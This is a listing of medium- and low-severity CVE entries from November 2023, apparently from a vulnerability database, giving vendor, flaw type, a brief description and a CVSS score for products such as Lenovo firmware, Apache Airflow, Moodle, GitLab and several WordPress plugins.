2023-11-08 CVE-2023-43574 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A buffer over-read was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
2023-11-08 CVE-2023-43568 Lenovo Buffer Over-read vulnerability in Lenovo products

A buffer over-read was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
2023-11-12 CVE-2023-47037 Apache Incorrect Authorization vulnerability in Apache Airflow

We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then.  Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes.

4.3
2023-11-11 CVE-2023-5959 Byzoro Weak Password Recovery Mechanism for Forgotten Password vulnerability in Byzoro Smart S85F Firmware V31R02B1001

A vulnerability, which was classified as problematic, was found in Byzoro Smart S85F Management Platform V31R02B10-01.

4.3
2023-11-09 CVE-2023-5542 Moodle
Fedoraproject
Exposure of Resource to Wrong Sphere vulnerability in multiple products

Students in "Only see own membership" groups could see other students in the group, which should be hidden.

4.3
2023-11-09 CVE-2023-46743 Xwiki Incorrect Default Permissions vulnerability in Xwiki Application-Collabora

application-collabora is an integration of Collabora Online in XWiki.

4.3
2023-11-08 CVE-2023-41270 Samsung Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Ue40D7000 Firmware Tgapdeuc1033.2

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

4.3
2023-11-07 CVE-2023-4956 Redhat Improper Restriction of Rendered UI Layers or Frames vulnerability in Redhat Quay 3.0.0

A flaw was found in Quay.

4.3
2023-11-07 CVE-2023-5818 Gara Cross-Site Request Forgery (CSRF) vulnerability in Gara Amazonify

The Amazonify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1.

4.3
2023-11-07 CVE-2023-5506 Imagemapper Project Missing Authorization vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'imgmap_delete_area_ajax' function in versions up to, and including, 1.2.6.

4.3
2023-11-07 CVE-2023-5532 Imagemapper Project Cross-Site Request Forgery (CSRF) vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6.

4.3
2023-11-07 CVE-2023-5975 Imagemapper Project Cross-Site Request Forgery (CSRF) vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6.

4.3
2023-11-07 CVE-2023-38548 Veeam Unspecified vulnerability in Veeam ONE 12.0.0.2498/12.0.1.2591

A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service.

4.3
2023-11-07 CVE-2023-41723 Veeam Unspecified vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule.

4.3
2023-11-07 CVE-2023-5900 SFU Cross-Site Request Forgery (CSRF) vulnerability in SFU PKP web Application Library

Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.3
2023-11-07 CVE-2023-5902 SFU Cross-Site Request Forgery (CSRF) vulnerability in SFU PKP web Application Library

Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.3
2023-11-07 CVE-2023-5976 Microweber Improper Access Control vulnerability in Microweber

Improper Access Control in GitHub repository microweber/microweber prior to 2.0.

4.3
2023-11-07 CVE-2023-38509 Xwiki Resource Leak vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

4.3
2023-11-06 CVE-2023-5352 Getawesomesupport Incorrect Authorization vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.

4.3
2023-11-06 CVE-2023-46254 Clastix Unspecified vulnerability in Clastix Capsule and Capsule-Proxy

capsule-proxy is a reverse proxy for Capsule kubernetes multi-tenancy framework.

4.3
2023-11-06 CVE-2023-5967 Mattermost Improper Check for Unusual or Exceptional Conditions vulnerability in Mattermost

Mattermost fails to properly validate requests to the Calls plugin, allowing an attacker sending a request without a User Agent header to cause a panic and crash the Calls plugin

4.3
2023-11-06 CVE-2023-3246 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab EE/CE affecting all versions starting before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1 which allows an attackers to block Sidekiq job processor.

4.3
2023-11-06 CVE-2023-5963 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE with Advanced Search affecting all versions from 13.9 to 16.3.6, 16.4 prior to 16.4.2 and 16.5 prior to 16.5.1 that could allow a denial of service in the Advanced Search function by chaining too many syntax operators.

4.3

9 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-08 CVE-2023-26221 Tibco Insufficiently Protected Credentials vulnerability in Tibco products

The Spotfire Connectors component of TIBCO Software Inc.'s Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace contains an easily exploitable vulnerability that allows a low privileged attacker with read/write access to craft malicious Analyst files.

3.9
2023-11-06 CVE-2023-4535 Opensc Project
Redhat
Fedoraproject
Out-of-bounds Read vulnerability in multiple products

An out-of-bounds read vulnerability was found in OpenSC packages within the MyEID driver when handling symmetric key encryption.

3.8
2023-11-08 CVE-2023-47111 Zitadel Race Condition vulnerability in Zitadel

ZITADEL provides identity infrastructure.

3.7
2023-11-10 CVE-2023-47614 Telit Unspecified vulnerability in Telit products

A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to disclose hidden virtual paths and file names on the targeted system.

3.3
2023-11-10 CVE-2023-45816 Discourse Information Exposure vulnerability in Discourse

Discourse is an open source platform for community discussion.

3.3
2023-11-09 CVE-2023-5543 Moodle
Fedoraproject
When duplicating a BigBlueButton activity, the original meeting ID was also duplicated instead of using a new ID for the new activity.
3.3
2023-11-09 CVE-2023-5551 Moodle
Fedoraproject
Separate Groups mode restrictions were not honoured in the forum summary report, which would display users from other groups.
3.3
2023-11-07 CVE-2023-42542 Samsung Unspecified vulnerability in Samsung Push Service

Improper access control vulnerability in Samsung Push Service prior to 3.4.10 allows local attackers to get register ID to identify the device.

3.3
2023-11-07 CVE-2023-42552 Samsung Unspecified vulnerability in Samsung Firewall

Implicit intent hijacking vulnerability in Firewall application prior to versions 12.1.00.24 in Android 11, 13.1.00.16 in Android 12 and 14.1.00.7 in Android 13 allows 3rd party application to tamper the database of Firewall.

3.3